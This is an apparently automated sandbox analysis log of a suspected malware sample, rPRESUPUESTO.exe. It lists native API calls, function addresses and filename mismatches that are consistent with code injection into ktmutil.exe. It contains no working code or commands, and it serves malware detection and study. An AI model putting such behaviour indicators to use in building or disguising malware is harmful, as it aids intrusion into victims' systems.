            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92DD0 NtDelayExecution,LdrInitializeThunk,9_2_02B92DD0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_02B92D30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92D10 NtMapViewOfSection,LdrInitializeThunk,9_2_02B92D10
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B935C0 NtCreateMutant,LdrInitializeThunk,9_2_02B935C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B939B0 NtGetContextThread,LdrInitializeThunk,9_2_02B939B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92AB0 NtWaitForSingleObject,9_2_02B92AB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92B80 NtQueryInformationFile,9_2_02B92B80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92EA0 NtAdjustPrivilegesToken,9_2_02B92EA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92E30 NtWriteVirtualMemory,9_2_02B92E30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92FA0 NtQuerySection,9_2_02B92FA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92F90 NtProtectVirtualMemory,9_2_02B92F90
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92F60 NtCreateProcessEx,9_2_02B92F60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92CF0 NtOpenProcess,9_2_02B92CF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92CC0 NtQueryVirtualMemory,9_2_02B92CC0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92C00 NtQueryInformationProcess,9_2_02B92C00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92DB0 NtEnumerateKey,9_2_02B92DB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B92D00 NtSetInformationFile,9_2_02B92D00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B93090 NtSetValueKey,9_2_02B93090
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B93010 NtOpenDirectoryObject,9_2_02B93010
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B93D10 NtOpenProcessToken,9_2_02B93D10
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B93D70 NtOpenThread,9_2_02B93D70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A8010 NtReadFile,9_2_001A8010
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A80F0 NtDeleteFile,9_2_001A80F0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A8190 NtClose,9_2_001A8190
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A82E0 NtAllocateVirtualMemory,9_2_001A82E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001A7EB0 NtCreateFile,9_2_001A7EB0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_0110DF140_2_0110DF14
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078743200_2_07874320
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_0787D2F80_2_0787D2F8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_07872AC10_2_07872AC1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078787A80_2_078787A8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078777680_2_07877768
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078773300_2_07877330
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078792CF0_2_078792CF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078792E00_2_078792E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_07876EF80_2_07876EF8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_0787ECC00_2_0787ECC0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 0_2_078789F80_2_078789F8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004028005_2_00402800
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0042DA635_2_0042DA63
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004032075_2_00403207
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004032105_2_00403210
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004022CC5_2_004022CC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004022D05_2_004022D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0041028D5_2_0041028D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004102935_2_00410293
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00416BFE5_2_00416BFE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00416C035_2_00416C03
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004024CC5_2_004024CC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004024D05_2_004024D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00402C8B5_2_00402C8B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00402C905_2_00402C90
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_004104B35_2_004104B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0040E52A5_2_0040E52A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0040E5335_2_0040E533
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00402EC05_2_00402EC0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00402EBB5_2_00402EBB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A01AA5_2_018A01AA
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018941A25_2_018941A2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018981CC5_2_018981CC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D01005_2_017D0100
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187A1185_2_0187A118
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018681585_2_01868158
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018720005_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A03E65_2_018A03E6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE3F05_2_017EE3F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189A3525_2_0189A352
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018602C05_2_018602C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018802745_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A05915_2_018A0591
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E05355_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188E4F65_2_0188E4F6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018844205_2_01884420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018924465_2_01892446
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E07705_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DC7C05_2_017DC7C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018047505_2_01804750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FC6E05_2_017FC6E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F69625_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018AA9A65_2_018AA9A6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A05_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E28405_2_017E2840
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EA8405_2_017EA840
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E8F05_2_0180E8F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C68B85_2_017C68B8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01896BD75_2_01896BD7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189AB405_2_0189AB40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DEA805_2_017DEA80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EAD005_2_017EAD00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187CD1F5_2_0187CD1F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DADE05_2_017DADE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F8DBF5_2_017F8DBF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880CB55_2_01880CB5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0C005_2_017E0C00
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0CF25_2_017D0CF2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185EFA05_2_0185EFA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017ECFE05_2_017ECFE0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01822F285_2_01822F28
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01800F305_2_01800F30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2FC85_2_017D2FC8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01882F305_2_01882F30
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01854F405_2_01854F40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189CE935_2_0189CE93
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0E595_2_017E0E59
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189EEDB5_2_0189EEDB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189EE265_2_0189EE26
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F2E905_2_017F2E90
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CF1725_2_017CF172
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EB1B05_2_017EB1B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018AB16B5_2_018AB16B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181516C5_2_0181516C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188F0CC5_2_0188F0CC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018970E95_2_018970E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189F0E05_2_0189F0E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E70C05_2_017E70C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0182739A5_2_0182739A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CD34C5_2_017CD34C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189132D5_2_0189132D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018812ED5_2_018812ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FB2C05_2_017FB2C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E52A05_2_017E52A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187D5B05_2_0187D5B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A95C35_2_018A95C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018975715_2_01897571
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D14605_2_017D1460
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189F43F5_2_0189F43F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189F7B05_2_0189F7B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018916CC5_2_018916CC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018256305_2_01825630
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E99505_2_017E9950
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FB9505_2_017FB950
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018759105_2_01875910
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184D8005_2_0184D800
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E38E05_2_017E38E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01855BF05_2_01855BF0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181DBF95_2_0181DBF9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189FB765_2_0189FB76
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FFB805_2_017FFB80
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01825AA05_2_01825AA0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187DAAC5_2_0187DAAC
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01881AA35_2_01881AA3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188DAC65_2_0188DAC6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189FA495_2_0189FA49
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01897A465_2_01897A46
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01853A6C5_2_01853A6C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E3D405_2_017E3D40
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FFDC05_2_017FFDC0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01891D5A5_2_01891D5A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01897D735_2_01897D73
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189FCF25_2_0189FCF2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01859C325_2_01859C32
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189FFB15_2_0189FFB1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189FF095_2_0189FF09
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E1F925_2_017E1F92
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E9EB05_2_017E9EB0
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeCode function: 8_2_04C6BFCA8_2_04C6BFCA
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BE02C09_2_02BE02C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C002749_2_02C00274
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C203E69_2_02C203E6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B6E3F09_2_02B6E3F0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1A3529_2_02C1A352
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BF20009_2_02BF2000
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C181CC9_2_02C181CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C141A29_2_02C141A2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C201AA9_2_02C201AA
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BFA1189_2_02BFA118
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B501009_2_02B50100
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BE81589_2_02BE8158
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B7C6E09_2_02B7C6E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B5C7C09_2_02B5C7C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B607709_2_02B60770
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B847509_2_02B84750
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C0E4F69_2_02C0E4F6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C124469_2_02C12446
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C044209_2_02C04420
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C205919_2_02C20591
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B605359_2_02B60535
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B5EA809_2_02B5EA80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C16BD79_2_02C16BD7
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1AB409_2_02C1AB40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B468B89_2_02B468B8
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B8E8F09_2_02B8E8F0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B628409_2_02B62840
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B6A8409_2_02B6A840
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B629A09_2_02B629A0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C2A9A69_2_02C2A9A6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B769629_2_02B76962
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1EEDB9_2_02C1EEDB
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B72E909_2_02B72E90
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1CE939_2_02C1CE93
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1EE269_2_02C1EE26
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B60E599_2_02B60E59
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BDEFA09_2_02BDEFA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B6CFE09_2_02B6CFE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B52FC89_2_02B52FC8
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B80F309_2_02B80F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BA2F289_2_02BA2F28
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C02F309_2_02C02F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BD4F409_2_02BD4F40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B50CF29_2_02B50CF2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C00CB59_2_02C00CB5
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B60C009_2_02B60C00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B78DBF9_2_02B78DBF
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B5ADE09_2_02B5ADE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BFCD1F9_2_02BFCD1F
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B6AD009_2_02B6AD00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B652A09_2_02B652A0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C012ED9_2_02C012ED
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B7B2C09_2_02B7B2C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BA739A9_2_02BA739A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1132D9_2_02C1132D
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B4D34C9_2_02B4D34C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C0F0CC9_2_02C0F0CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1F0E09_2_02C1F0E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C170E99_2_02C170E9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B670C09_2_02B670C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B6B1B09_2_02B6B1B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C2B16B9_2_02C2B16B
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B4F1729_2_02B4F172
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B9516C9_2_02B9516C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C116CC9_2_02C116CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1F7B09_2_02C1F7B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B514609_2_02B51460
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1F43F9_2_02C1F43F
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BFD5B09_2_02BFD5B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C175719_2_02C17571
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C0DAC69_2_02C0DAC6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BFDAAC9_2_02BFDAAC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BA5AA09_2_02BA5AA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C01AA39_2_02C01AA3
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C17A469_2_02C17A46
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1FA499_2_02C1FA49
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BD3A6C9_2_02BD3A6C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B7FB809_2_02B7FB80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B9DBF99_2_02B9DBF9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BD5BF09_2_02BD5BF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1FB769_2_02C1FB76
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B638E09_2_02B638E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BCD8009_2_02BCD800
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BF59109_2_02BF5910
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B699509_2_02B69950
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B7B9509_2_02B7B950
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B69EB09_2_02B69EB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B61F929_2_02B61F92
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1FFB19_2_02C1FFB1
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1FF099_2_02C1FF09
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C1FCF29_2_02C1FCF2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02BD9C329_2_02BD9C32
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B7FDC09_2_02B7FDC0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C11D5A9_2_02C11D5A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02C17D739_2_02C17D73
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02B63D409_2_02B63D40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_00191C309_2_00191C30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001AA5D09_2_001AA5D0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018CDFA9_2_0018CDFA
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018CE009_2_0018CE00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018D0209_2_0018D020
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018B0979_2_0018B097
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0018B0A09_2_0018B0A0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_001937709_2_00193770
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0019376B9_2_0019376B
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02A1C0CC9_2_02A1C0CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02A1B1389_2_02A1B138
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02A1BC189_2_02A1BC18
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_02A1BD349_2_02A1BD34
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BDF290 appears 105 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BA7E54 appears 102 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02B95130 appears 58 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02BCEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 02B4B970 appears 280 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 01815130 appears 58 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 0184EA12 appears 86 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 0185F290 appears 105 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 017CB970 appears 280 times
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: String function: 01827E54 appears 111 times
            Source: rPRESUPUESTO.exeStatic PE information: invalid certificate
            Source: rPRESUPUESTO.exe, 00000000.00000002.2177247151.0000000008260000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2156547994.0000000003B94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000000.2107699346.000000000058E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegESw.exe, vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs rPRESUPUESTO.exe
